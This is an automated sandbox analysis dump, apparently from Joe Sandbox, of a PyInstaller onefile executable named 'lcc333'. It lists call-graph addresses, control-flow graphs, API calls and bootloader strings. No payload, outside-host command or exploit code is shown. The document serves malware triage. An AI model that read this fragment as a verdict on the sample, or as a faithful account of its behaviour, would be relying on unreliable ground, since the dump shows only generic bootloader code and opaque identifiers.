17535->17536 17538 7ff714c94a3f 17535->17538 17537 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17536->17537 17540 7ff714c94a2d 17537->17540 17573 7ff714c92c10 17538->17573 17542 7ff714c8c550 _log10_special 8 API calls 17540->17542 17541 7ff714c94b1c 17543 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17541->17543 17545 7ff714c829c3 17542->17545 17543->17540 17552 7ff714c95160 17545->17552 17546 7ff714c94b40 17546->17541 17548 7ff714c94b4a 17546->17548 17547 7ff714c94af1 17549 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17547->17549 17551 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17548->17551 17549->17540 17550 7ff714c94ae8 17550->17541 17550->17547 17551->17540 17553 7ff714c9b2c8 _set_fmode 11 API calls 17552->17553 17554 7ff714c95177 17553->17554 17555 7ff714c829e5 17554->17555 17556 7ff714c9eb98 _set_fmode 11 API calls 17554->17556 17559 7ff714c951b7 17554->17559 17555->17496 17557 7ff714c951ac 17556->17557 17558 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17557->17558 17558->17559 17559->17555 17711 7ff714c9ec20 17559->17711 17562 7ff714c9a900 _isindst 17 API calls 17563 7ff714c951fc 17562->17563 17565 7ff714c8262f 17564->17565 17566 7ff714c89390 2 API calls 17565->17566 17567 7ff714c82660 17566->17567 17568 7ff714c82683 MessageBoxA 17567->17568 17569 7ff714c8266f MessageBoxW 17567->17569 17570 7ff714c82690 17568->17570 17569->17570 17571 7ff714c8c550 _log10_special 8 API calls 17570->17571 17572 7ff714c826a0 17571->17572 17572->17500 17574 7ff714c92c4e 17573->17574 17575 7ff714c92c3e 17573->17575 17576 7ff714c92c57 17574->17576 17585 7ff714c92c85 17574->17585 17577 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17575->17577 17578 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17576->17578 17579 7ff714c92c7d 17577->17579 17578->17579 17579->17541 17579->17546 17579->17547 17579->17550 17580 7ff714c947c0 45 API calls 17580->17585 17582 7ff714c92f34 17584 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17582->17584 17584->17575 17585->17575 17585->17579 17585->17580 17585->17582 17587 7ff714c935a0 17585->17587 17613 7ff714c93268 17585->17613 17643 7ff714c92af0 17585->17643 17588 7ff714c935e2 17587->17588 17589 7ff714c93655 17587->17589 17590 7ff714c9367f 17588->17590 17591 7ff714c935e8 17588->17591 17592 7ff714c936af 17589->17592 17593 7ff714c9365a 17589->17593 17660 7ff714c91b50 17590->17660 17598 7ff714c935ed 17591->17598 17601 7ff714c936be 17591->17601 17592->17590 17592->17601 17611 7ff714c93618 17592->17611 17594 7ff714c9368f 17593->17594 17595 7ff714c9365c 17593->17595 17667 7ff714c91740 17594->17667 17597 7ff714c935fd 17595->17597 17604 7ff714c9366b 17595->17604 17612 7ff714c936ed 17597->17612 17646 7ff714c93f04 17597->17646 17598->17597 17602 7ff714c93630 17598->17602 17598->17611 17601->17612 17674 7ff714c91f60 17601->17674 17602->17612 17656 7ff714c943c0 17602->17656 17604->17590 17605 7ff714c93670 17604->17605 17608 7ff714c94558 37 API calls 17605->17608 17605->17612 17607 7ff714c8c550 _log10_special 8 API calls 17609 7ff714c93983 17607->17609 17608->17611 17609->17585 17611->17612 17681 7ff714c9e858 17611->17681 17612->17607 17614 7ff714c93273 17613->17614 17615 7ff714c93289 17613->17615 17616 7ff714c932c7 17614->17616 17617 7ff714c935e2 17614->17617 17618 7ff714c93655 17614->17618 17615->17616 17619 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17615->17619 17616->17585 17620 7ff714c9367f 17617->17620 17621 7ff714c935e8 17617->17621 17622 7ff714c936af 17618->17622 17623 7ff714c9365a 17618->17623 17619->17616 17626 7ff714c91b50 38 API calls 17620->17626 17628 7ff714c935ed 17621->17628 17631 7ff714c936be 17621->17631 17622->17620 17622->17631 17641 7ff714c93618 17622->17641 17624 7ff714c9368f 17623->17624 17625 7ff714c9365c 17623->17625 17629 7ff714c91740 38 API calls 17624->17629 17627 7ff714c935fd 17625->17627 17634 7ff714c9366b 17625->17634 17626->17641 17630 7ff714c93f04 47 API calls 17627->17630 17642 7ff714c936ed 17627->17642 17628->17627 17632 7ff714c93630 17628->17632 17628->17641 17629->17641 17630->17641 17633 7ff714c91f60 38 API calls 17631->17633 17631->17642 17635 7ff714c943c0 47 API calls 17632->17635 17632->17642 17633->17641 17634->17620 17636 7ff714c93670 17634->17636 17635->17641 17638 7ff714c94558 37 API calls 17636->17638 17636->17642 17637 7ff714c8c550 _log10_special 8 API calls 17639 7ff714c93983 17637->17639 17638->17641 17639->17585 17640 7ff714c9e858 47 API calls 17640->17641 17641->17640 17641->17642 17642->17637 17694 7ff714c90d14 17643->17694 17647 7ff714c93f26 17646->17647 17648 7ff714c90b80 12 API calls 17647->17648 17649 7ff714c93f6e 17648->17649 17650 7ff714c9e570 46 API calls 17649->17650 17651 7ff714c94041 17650->17651 17652 7ff714c947c0 45 API calls 17651->17652 17655 7ff714c94063 17651->17655 17652->17655 17653 7ff714c940ec 17653->17611 17653->17653 17654 7ff714c947c0 45 API calls 17654->17653 17655->17653 17655->17654 17655->17655 17657 7ff714c94440 17656->17657 17658 7ff714c943d8 17656->17658 17657->17611 17658->17657 17659 7ff714c9e858 47 API calls 17658->17659 17659->17657 17661 7ff714c91b83 17660->17661 17662 7ff714c91bb2 17661->17662 17664 7ff714c91c6f 17661->17664 17663 7ff714c90b80 12 API calls 17662->17663 17666 7ff714c91bef 17662->17666 17663->17666 17665 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17664->17665 17665->17666 17666->17611 17668 7ff714c91773 17667->17668 17669 7ff714c917a2 17668->17669 17671 7ff714c9185f 17668->17671 17670 7ff714c90b80 12 API calls 17669->17670 17673 7ff714c917df 17669->17673 17670->17673 17672 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17671->17672 17672->17673 17673->17611 17676 7ff714c91f93 17674->17676 17675 7ff714c91fc2 17677 7ff714c90b80 12 API calls 17675->17677 17680 7ff714c91fff 17675->17680 17676->17675 17678 7ff714c9207f 17676->17678 17677->17680 17679 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17678->17679 17679->17680 17680->17611 17682 7ff714c9e880 17681->17682 17683 7ff714c9e8c5 17682->17683 17684 7ff714c947c0 45 API calls 17682->17684 17686 7ff714c9e885 __scrt_get_show_window_mode 17682->17686 17690 7ff714c9e8ae __scrt_get_show_window_mode 17682->17690 17683->17686 17683->17690 17691 7ff714ca07e8 17683->17691 17684->17683 17685 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17685->17686 17686->17611 17690->17685 17690->17686 17692 7ff714ca080c WideCharToMultiByte 17691->17692 17695 7ff714c90d41 17694->17695 17696 7ff714c90d53 17694->17696 17697 7ff714c94f08 _set_fmode 11 API calls 17695->17697 17698 7ff714c90d60 17696->17698 17702 7ff714c90d9d 17696->17702 17699 7ff714c90d46 17697->17699 17701 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 17698->17701 17700 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 17699->17700 17706 7ff714c90d51 17700->17706 17701->17706 17703 7ff714c90e46 17702->17703 17704 7ff714c94f08 _set_fmode 11 API calls 17702->17704 17705 7ff714c94f08 _set_fmode 11 API calls 17703->17705 17703->17706 17707 7ff714c90e3b 17704->17707 17708 7ff714c90ef0 17705->17708 17706->17585 17709 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 17707->17709 17710 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 17708->17710 17709->17703 17710->17706 17715 7ff714c9ec3d 17711->17715 17712 7ff714c9ec42 17713 7ff714c951dd 17712->17713 17714 7ff714c94f08 _set_fmode 11 API calls 17712->17714 17713->17555 17713->17562 17716 7ff714c9ec4c 17714->17716 17715->17712 17715->17713 17718 7ff714c9ec8c 17715->17718 17717 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 17716->17717 17717->17713 17718->17713 17719 7ff714c94f08 _set_fmode 11 API calls 17718->17719 17719->17716 17721 7ff714c885b1 GetTokenInformation 17720->17721 17724 7ff714c88633 __std_exception_copy 17720->17724 17722 7ff714c885d2 GetLastError 17721->17722 17723 7ff714c885dd 17721->17723 17722->17723 17722->17724 17723->17724 17727 7ff714c885f9 GetTokenInformation 17723->17727 17725 7ff714c88646 CloseHandle 17724->17725 17726 7ff714c8864c 17724->17726 17725->17726 17726->16868 17727->17724 17728 7ff714c8861c 17727->17728 17728->17724 17729 7ff714c88626 ConvertSidToStringSidW 17728->17729 17729->17724 17731 7ff714c8c850 17730->17731 17732 7ff714c82b74 GetCurrentProcessId 17731->17732 17733 7ff714c826b0 48 API calls 17732->17733 17734 7ff714c82bc7 17733->17734 17735 7ff714c94bd8 48 API calls 17734->17735 17736 7ff714c82c10 MessageBoxW 17735->17736 17737 7ff714c8c550 _log10_special 8 API calls 17736->17737 17738 7ff714c82c40 17737->17738 17738->16878 17740 7ff714c825e5 17739->17740 17741 7ff714c94bd8 48 API calls 17740->17741 17742 7ff714c82604 17741->17742 17742->16897 17788 7ff714c98794 17743->17788 17747 7ff714c881dc 17746->17747 17748 7ff714c89390 2 API calls 17747->17748 17749 7ff714c881fb 17748->17749 17750 7ff714c88203 17749->17750 17751 7ff714c88216 ExpandEnvironmentStringsW 17749->17751 17936 7ff714c8456a 17935->17936 17937 7ff714c89390 2 API calls 17936->17937 17938 7ff714c8458f 17937->17938 17939 7ff714c8c550 _log10_special 8 API calls 17938->17939 17940 7ff714c845b7 17939->17940 17940->16931 17943 7ff714c87e2e 17941->17943 17942 7ff714c87f52 17945 7ff714c8c550 _log10_special 8 API calls 17942->17945 17943->17942 17944 7ff714c81c80 49 API calls 17943->17944 17949 7ff714c87eb5 17944->17949 17946 7ff714c87f83 17945->17946 17946->16931 17947 7ff714c81c80 49 API calls 17947->17949 17948 7ff714c84560 10 API calls 17948->17949 17949->17942 17949->17947 17949->17948 17950 7ff714c89390 2 API calls 17949->17950 17951 7ff714c87f23 CreateDirectoryW 17950->17951 17951->17942 17951->17949 17953 7ff714c81637 17952->17953 17954 7ff714c81613 17952->17954 17955 7ff714c845c0 108 API calls 17953->17955 18073 7ff714c81050 17954->18073 17957 7ff714c8164b 17955->17957 17959 7ff714c81653 17957->17959 17960 7ff714c81682 17957->17960 17958 7ff714c81618 17962 7ff714c94f08 _set_fmode 11 API calls 17959->17962 17963 7ff714c845c0 108 API calls 17960->17963 17965 7ff714c81658 17962->17965 17966 7ff714c81696 17963->17966 17967 7ff714c82910 54 API calls 17965->17967 17968 7ff714c8169e 17966->17968 17969 7ff714c816b8 17966->17969 18001 7ff714c87144 18000->18001 18002 7ff714c8718b 18000->18002 18001->18002 18137 7ff714c95024 18001->18137 18002->16931 18005 7ff714c841a1 18004->18005 18006 7ff714c844e0 49 API calls 18005->18006 18007 7ff714c841db 18006->18007 18008 7ff714c844e0 49 API calls 18007->18008 18009 7ff714c841eb 18008->18009 18010 7ff714c8420d 18009->18010 18011 7ff714c8423c 18009->18011 18152 7ff714c84110 18010->18152 18013 7ff714c84110 51 API calls 18011->18013 18049 7ff714c81c80 49 API calls 18048->18049 18050 7ff714c84474 18049->18050 18050->16931 18074 7ff714c845c0 108 API calls 18073->18074 18075 7ff714c8108c 18074->18075 18076 7ff714c810a9 18075->18076 18077 7ff714c81094 18075->18077 18079 7ff714c906d4 73 API calls 18076->18079 18078 7ff714c82710 54 API calls 18077->18078 18085 7ff714c810a4 __std_exception_copy 18078->18085 18080 7ff714c810bf 18079->18080 18081 7ff714c810e6 18080->18081 18082 7ff714c810c3 18080->18082 18085->17958 18138 7ff714c95031 18137->18138 18139 7ff714c9505e 18137->18139 18141 7ff714c94f08 _set_fmode 11 API calls 18138->18141 18145 7ff714c94fe8 18138->18145 18140 7ff714c95081 18139->18140 18143 7ff714c9509d 18139->18143 18142 7ff714c94f08 _set_fmode 11 API calls 18140->18142 18144 7ff714c9503b 18141->18144 18146 7ff714c95086 18142->18146 18147 7ff714c94f4c 45 API calls 18143->18147 18148 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 18144->18148 18145->18001 18149 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 18146->18149 18151 7ff714c95091 18147->18151 18150 7ff714c95046 18148->18150 18149->18151 18150->18001 18151->18001 18153 7ff714c84136 18152->18153 18216 7ff714c95ec8 18215->18216 18217 7ff714c95eee 18216->18217 18220 7ff714c95f21 18216->18220 18218 7ff714c94f08 _set_fmode 11 API calls 18217->18218 18219 7ff714c95ef3 18218->18219 18221 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 18219->18221 18222 7ff714c95f34 18220->18222 18223 7ff714c95f27 18220->18223 18225 7ff714c84616 18221->18225 18234 7ff714c9ac28 18222->18234 18226 7ff714c94f08 _set_fmode 11 API calls 18223->18226 18225->16956 18226->18225 18247 7ff714ca02d8 EnterCriticalSection 18234->18247 18607 7ff714c978f8 18606->18607 18610 7ff714c973d4 18607->18610 18609 7ff714c97911 18609->16966 18611 7ff714c973ef 18610->18611 18612 7ff714c9741e 18610->18612 18613 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 18611->18613 18620 7ff714c9546c EnterCriticalSection 18612->18620 18616 7ff714c9740f 18613->18616 18616->18609 18622 7ff714c8fe71 18621->18622 18623 7ff714c8fe43 18621->18623 18630 7ff714c8fe63 18622->18630 18631 7ff714c9546c EnterCriticalSection 18622->18631 18624 7ff714c9a814 _invalid_parameter_noinfo 37 API calls 18623->18624 18624->18630 18630->16970 18633 7ff714c845c0 108 API calls 18632->18633 18634 7ff714c81493 18633->18634 18635 7ff714c814bc 18634->18635 18636 7ff714c8149b 18634->18636 18638 7ff714c906d4 73 API calls 18635->18638 18739 7ff714c86375 18738->18739 18740 7ff714c81c80 49 API calls 18739->18740 18741 7ff714c863b1 18740->18741 18742 7ff714c863dd 18741->18742 18743 7ff714c863ba 18741->18743 18745 7ff714c84630 49 API calls 18742->18745 18744 7ff714c82710 54 API calls 18743->18744 18746 7ff714c863d3 18744->18746 18747 7ff714c863f5 18745->18747 18751 7ff714c8c550 _log10_special 8 API calls 18746->18751 18748 7ff714c86413 18747->18748 18749 7ff714c82710 54 API calls 18747->18749 18749->18748

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00007FF714C889E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 7ff714c889e0-7ff714c88b26 call 7ff714c8c850 call 7ff714c89390 SetConsoleCtrlHandler GetStartupInfoW call 7ff714c953f0 call 7ff714c9a47c call 7ff714c9871c call 7ff714c953f0 call 7ff714c9a47c call 7ff714c9871c call 7ff714c953f0 call 7ff714c9a47c call 7ff714c9871c GetCommandLineW CreateProcessW 23 7ff714c88b28-7ff714c88b48 GetLastError call 7ff714c82c50 0->23 24 7ff714c88b4d-7ff714c88b89 RegisterClassW 0->24 31 7ff714c88e39-7ff714c88e5f call 7ff714c8c550 23->31 26 7ff714c88b91-7ff714c88be5 CreateWindowExW 24->26 27 7ff714c88b8b GetLastError 24->27 29 7ff714c88bef-7ff714c88bf4 ShowWindow 26->29 30 7ff714c88be7-7ff714c88bed GetLastError 26->30 27->26 32 7ff714c88bfa-7ff714c88c0a WaitForSingleObject 29->32 30->32 34 7ff714c88c88-7ff714c88c8f 32->34 35 7ff714c88c0c 32->35 36 7ff714c88c91-7ff714c88ca1 WaitForSingleObject 34->36 37 7ff714c88cd2-7ff714c88cd9 34->37 39 7ff714c88c10-7ff714c88c13 35->39 42 7ff714c88ca7-7ff714c88cb7 TerminateProcess 36->42 43 7ff714c88df8-7ff714c88e02 36->43 44 7ff714c88cdf-7ff714c88cf5 QueryPerformanceFrequency QueryPerformanceCounter 37->44 45 7ff714c88dc0-7ff714c88dd9 GetMessageW 37->45 40 7ff714c88c15 GetLastError 39->40 41 7ff714c88c1b-7ff714c88c22 39->41 40->41 41->36 46 7ff714c88c24-7ff714c88c41 PeekMessageW 41->46 51 7ff714c88cbf-7ff714c88ccd WaitForSingleObject 42->51 52 7ff714c88cb9 GetLastError 42->52 49 7ff714c88e11-7ff714c88e35 GetExitCodeProcess CloseHandle * 2 43->49 50 7ff714c88e04-7ff714c88e0a DestroyWindow 43->50 53 7ff714c88d00-7ff714c88d38 MsgWaitForMultipleObjects PeekMessageW 44->53 47 7ff714c88def-7ff714c88df6 45->47 48 7ff714c88ddb-7ff714c88de9 TranslateMessage DispatchMessageW 45->48 54 7ff714c88c43-7ff714c88c74 TranslateMessage DispatchMessageW PeekMessageW 46->54 55 7ff714c88c76-7ff714c88c86 WaitForSingleObject 46->55 47->43 47->45 48->47 49->31 50->49 51->43 52->51 56 7ff714c88d73-7ff714c88d7a 53->56 57 7ff714c88d3a 53->57 54->54 54->55 55->34 55->39 56->45 58 7ff714c88d7c-7ff714c88da5 QueryPerformanceCounter 56->58 59 7ff714c88d40-7ff714c88d71 TranslateMessage DispatchMessageW PeekMessageW 57->59 58->53 60 7ff714c88dab-7ff714c88db2 58->60 59->56 59->59 60->43 61 7ff714c88db4-7ff714c88db8 60->61 61->45
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                          • API String ID: 3832162212-3165540532
                                                                                                                                                          • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                          • Instruction ID: 32577c0339d7cc267d83ba3f24ed32191e58486f1d07f23a856788adc07803f0
                                                                                                                                                          • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                          • Instruction Fuzzy Hash: 22D17A32A04E8385E710AF76E8952AEB760FF85B64F900536DB5D43A94EF3CD549C720
                                                                                                                                                          Function 00007FF714C81000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 62 7ff714c81000-7ff714c83806 call 7ff714c8fe18 call 7ff714c8fe20 call 7ff714c8c850 call 7ff714c953f0 call 7ff714c95484 call 7ff714c836b0 76 7ff714c83808-7ff714c8380f 62->76 77 7ff714c83814-7ff714c83836 call 7ff714c81950 62->77 78 7ff714c83c97-7ff714c83cb2 call 7ff714c8c550 76->78 82 7ff714c8383c-7ff714c83856 call 7ff714c81c80 77->82 83 7ff714c8391b-7ff714c83931 call 7ff714c845c0 77->83 87 7ff714c8385b-7ff714c8389b call 7ff714c88830 82->87 90 7ff714c8396a-7ff714c8397f call 7ff714c82710 83->90 91 7ff714c83933-7ff714c83960 call 7ff714c87f90 83->91 96 7ff714c8389d-7ff714c838a3 87->96 97 7ff714c838c1-7ff714c838cc call 7ff714c94f30 87->97 99 7ff714c83c8f 90->99 103 7ff714c83984-7ff714c839a6 call 7ff714c81c80 91->103 104 7ff714c83962-7ff714c83965 call 7ff714c9004c 91->104 100 7ff714c838a5-7ff714c838ad 96->100 101 7ff714c838af-7ff714c838bd call 7ff714c889a0 96->101 111 7ff714c839fc-7ff714c83a2a call 7ff714c88940 call 7ff714c889a0 * 3 97->111 112 7ff714c838d2-7ff714c838e1 call 7ff714c88830 97->112 99->78 100->101 101->97 114 7ff714c839b0-7ff714c839b9 103->114 104->90 138 7ff714c83a2f-7ff714c83a3e call 7ff714c88830 111->138 119 7ff714c838e7-7ff714c838ed 112->119 120 7ff714c839f4-7ff714c839f7 call 7ff714c94f30 112->120 114->114 118 7ff714c839bb-7ff714c839d8 call 7ff714c81950 114->118 118->87 130 7ff714c839de-7ff714c839ef call 7ff714c82710 118->130 123 7ff714c838f0-7ff714c838fc 119->123 120->111 127 7ff714c838fe-7ff714c83903 123->127 128 7ff714c83905-7ff714c83908 123->128 127->123 127->128 128->120 131 7ff714c8390e-7ff714c83916 call 7ff714c94f30 128->131 130->99 131->138 141 7ff714c83b45-7ff714c83b53 138->141 142 7ff714c83a44-7ff714c83a47 138->142 143 7ff714c83b59-7ff714c83b5d 141->143 144 7ff714c83a67 141->144 142->141 145 7ff714c83a4d-7ff714c83a50 142->145 146 7ff714c83a6b-7ff714c83a90 call 7ff714c94f30 143->146 144->146 147 7ff714c83a56-7ff714c83a5a 145->147 148 7ff714c83b14-7ff714c83b17 145->148 156 7ff714c83aab-7ff714c83ac0 146->156 157 7ff714c83a92-7ff714c83aa6 call 7ff714c88940 146->157 147->148 150 7ff714c83a60 147->150 151 7ff714c83b19-7ff714c83b1d 148->151 152 7ff714c83b2f-7ff714c83b40 call 7ff714c82710 148->152 150->144 151->152 155 7ff714c83b1f-7ff714c83b2a 151->155 160 7ff714c83c7f-7ff714c83c87 152->160 155->146 161 7ff714c83be8-7ff714c83bfa call 7ff714c88830 156->161 162 7ff714c83ac6-7ff714c83aca 156->162 157->156 160->99 170 7ff714c83c2e 161->170 171 7ff714c83bfc-7ff714c83c02 161->171 164 7ff714c83bcd-7ff714c83be2 call 7ff714c81940 162->164 165 7ff714c83ad0-7ff714c83ae8 call 7ff714c95250 162->165 164->161 164->162 175 7ff714c83aea-7ff714c83b02 call 7ff714c95250 165->175 176 7ff714c83b62-7ff714c83b7a call 7ff714c95250 165->176 177 7ff714c83c31-7ff714c83c40 call 7ff714c94f30 170->177 173 7ff714c83c1e-7ff714c83c2c 171->173 174 7ff714c83c04-7ff714c83c1c 171->174 173->177 174->177 175->164 186 7ff714c83b08-7ff714c83b0f 175->186 184 7ff714c83b7c-7ff714c83b80 176->184 185 7ff714c83b87-7ff714c83b9f call 7ff714c95250 176->185 187 7ff714c83c46-7ff714c83c4a 177->187 188 7ff714c83d41-7ff714c83d63 call 7ff714c844e0 177->188 184->185 201 7ff714c83bac-7ff714c83bc4 call 7ff714c95250 185->201 202 7ff714c83ba1-7ff714c83ba5 185->202 186->164 191 7ff714c83cd4-7ff714c83ce6 call 7ff714c88830 187->191 192 7ff714c83c50-7ff714c83c5f call 7ff714c890e0 187->192 199 7ff714c83d65-7ff714c83d6f call 7ff714c84630 188->199 200 7ff714c83d71-7ff714c83d82 call 7ff714c81c80 188->200 205 7ff714c83ce8-7ff714c83ceb 191->205 206 7ff714c83d35-7ff714c83d3c 191->206 203 7ff714c83cb3-7ff714c83cb6 call 7ff714c88660 192->203 204 7ff714c83c61 192->204 213 7ff714c83d87-7ff714c83d96 199->213 200->213 201->164 216 7ff714c83bc6 201->216 202->201 221 7ff714c83cbb-7ff714c83cbd 203->221 210 7ff714c83c68 call 7ff714c82710 204->210 205->206 211 7ff714c83ced-7ff714c83d10 call 7ff714c81c80 205->211 206->210 222 7ff714c83c6d-7ff714c83c77 210->222 228 7ff714c83d2b-7ff714c83d33 call 7ff714c94f30 211->228 229 7ff714c83d12-7ff714c83d26 call 7ff714c82710 call 7ff714c94f30 211->229 219 7ff714c83dbc-7ff714c83dd2 call 7ff714c89390 213->219 220 7ff714c83d98-7ff714c83d9f 213->220 216->164 234 7ff714c83dd4 219->234 235 7ff714c83de0-7ff714c83dfc SetDllDirectoryW 219->235 220->219 224 7ff714c83da1-7ff714c83da5 220->224 226 7ff714c83cc8-7ff714c83ccf 221->226 227 7ff714c83cbf-7ff714c83cc6 221->227 222->160 224->219 230 7ff714c83da7-7ff714c83db6 LoadLibraryExW 224->230 226->213 227->210 228->213 229->222 230->219 234->235 236 7ff714c83ef9-7ff714c83f00 235->236 237 7ff714c83e02-7ff714c83e11 call 7ff714c88830 235->237 242 7ff714c83f06-7ff714c83f0d 236->242 243 7ff714c84000-7ff714c84008 236->243 250 7ff714c83e2a-7ff714c83e34 call 7ff714c94f30 237->250 251 7ff714c83e13-7ff714c83e19 237->251 242->243 248 7ff714c83f13-7ff714c83f1d call 7ff714c833c0 242->248 244 7ff714c8402d-7ff714c8405f call 7ff714c836a0 call 7ff714c83360 call 7ff714c83670 call 7ff714c86fc0 call 7ff714c86d70 243->244 245 7ff714c8400a-7ff714c84027 PostMessageW GetMessageW 243->245 245->244 248->222 258 7ff714c83f23-7ff714c83f37 call 7ff714c890c0 248->258 263 7ff714c83eea-7ff714c83ef4 call 7ff714c88940 250->263 264 7ff714c83e3a-7ff714c83e40 250->264 255 7ff714c83e1b-7ff714c83e23 251->255 256 7ff714c83e25-7ff714c83e27 251->256 255->256 256->250 269 7ff714c83f5c-7ff714c83f98 call 7ff714c88940 call 7ff714c889e0 call 7ff714c86fc0 call 7ff714c86d70 call 7ff714c888e0 258->269 270 7ff714c83f39-7ff714c83f56 PostMessageW GetMessageW 258->270 263->236 264->263 268 7ff714c83e46-7ff714c83e4c 264->268 272 7ff714c83e4e-7ff714c83e50 268->272 273 7ff714c83e57-7ff714c83e59 268->273 308 7ff714c83f9d-7ff714c83f9f 269->308 270->269 274 7ff714c83e5f-7ff714c83e7b call 7ff714c86dc0 call 7ff714c87340 272->274 277 7ff714c83e52 272->277 273->236 273->274 289 7ff714c83e7d-7ff714c83e84 274->289 290 7ff714c83e86-7ff714c83e8d 274->290 277->236 292 7ff714c83ed3-7ff714c83ee8 call 7ff714c82a50 call 7ff714c86fc0 call 7ff714c86d70 289->292 293 7ff714c83ea7-7ff714c83eb1 call 7ff714c871b0 290->293 294 7ff714c83e8f-7ff714c83e9c call 7ff714c86e00 290->294 292->236 306 7ff714c83ebc-7ff714c83eca call 7ff714c874f0 293->306 307 7ff714c83eb3-7ff714c83eba 293->307 294->293 305 7ff714c83e9e-7ff714c83ea5 294->305 305->292 306->236 317 7ff714c83ecc 306->317 307->292 310 7ff714c83fed-7ff714c83ffb call 7ff714c81900 308->310 311 7ff714c83fa1-7ff714c83fb7 call 7ff714c88ed0 call 7ff714c888e0 308->311 310->222 311->310 323 7ff714c83fb9-7ff714c83fce 311->323 317->292 324 7ff714c83fe8 call 7ff714c82a50 323->324 325 7ff714c83fd0-7ff714c83fe3 call 7ff714c82710 call 7ff714c81900 323->325 324->310 325->222
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastModuleName
                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child 